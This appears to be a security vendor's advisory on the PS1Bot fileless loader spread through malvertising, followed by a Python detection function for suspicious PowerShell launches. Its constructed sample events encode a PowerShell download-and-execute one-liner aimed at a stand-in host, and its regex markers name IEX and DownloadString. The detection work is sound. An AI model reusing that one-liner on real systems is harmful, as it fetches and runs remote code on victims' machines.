PS1Bot Loader: Fileless Malware Spread Through Malvertising Ads
In August 2025, researchers uncovered a sophisticated malvertising campaign distributing the PS1Bot loader through search engine ads and compromised ad networks. Unsuspecting users searching for popular software were diverted to attacker-controlled domains hosting trojanized installers that mimicked legitimate applications.
Once executed, these installers trigger a multi-stage, in-memory infection chain designed to remain invisible to traditional security controls. At its core, the PS1Bot loader employs heavily obfuscated PowerShell and a modular payload delivery mechanism capable of deploying information stealers, remote access trojans (RATs), or ransomware on demand.
This campaign exemplifies the broader adversarial trend of abusing living-off-the-land binaries (LOLBins) such as PowerShell and Windows Installer, combined with social engineering through malvertising and SEO poisoning. By avoiding disk artefacts and executing entirely in memory, PS1Bot significantly complicates forensic analysis, impedes signature-based detection, and highlights the growing inadequacy of conventional antivirus solutions against modern, modular malware ecosystems.
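Because an in-memory chain leaves little on disk to signature, detection has to lean on process lineage and command-line behaviour. The following is an added example, not taken from the report: a triage function over process-creation events that flags PowerShell launched by Windows Installer with an encoded or download-and-execute command line. The event field names follow Sysmon Event ID 1; the marker list is a generic heuristic and an assumption, not a set of PS1Bot indicators, and the sample events are constructed.

```python
import base64
import re

PS_IMAGES = ("powershell.exe", "pwsh.exe")
INSTALLER_PARENTS = ("msiexec.exe",)  # assumption: extend with your own installer hosts
# PowerShell accepts any prefix of -EncodedCommand, plus the alias -ec.
ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}
# Generic in-memory execution markers (assumption), not PS1Bot-specific indicators.
MARKERS = {
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download": re.compile(r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod", re.I),
    "reflection": re.compile(r"frombase64string|reflection\.assembly", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] in "-/" and tok[1:].lower() in ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:  # covers malformed base64 and bad UTF-16
                return None
    return None

def assess(event):
    """Return the list of reasons a process-creation event looks suspicious."""
    if basename(event["Image"]) not in PS_IMAGES:
        return []
    reasons = []
    if basename(event["ParentImage"]) in INSTALLER_PARENTS:
        reasons.append("installer-parent")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        reasons.append("encoded-command")
    # Scan both the visible command line and the decoded script body.
    text = event["CommandLine"] + " " + (decoded or "")
    reasons += [name for name, rx in MARKERS.items() if rx.search(text)]
    return reasons

# Constructed sample events (not captured from the campaign).
SAMPLE_B64 = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\msiexec.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc " + SAMPLE_B64},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]
```

Run assess() over each exported event; the first constructed event is flagged for its installer parent, its encoded command and the decoded download-and-execute content, while the routine script run returns no reasons.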
Download the Full Report from our Blogs page: https://www.cyberstash.com/published-advisories/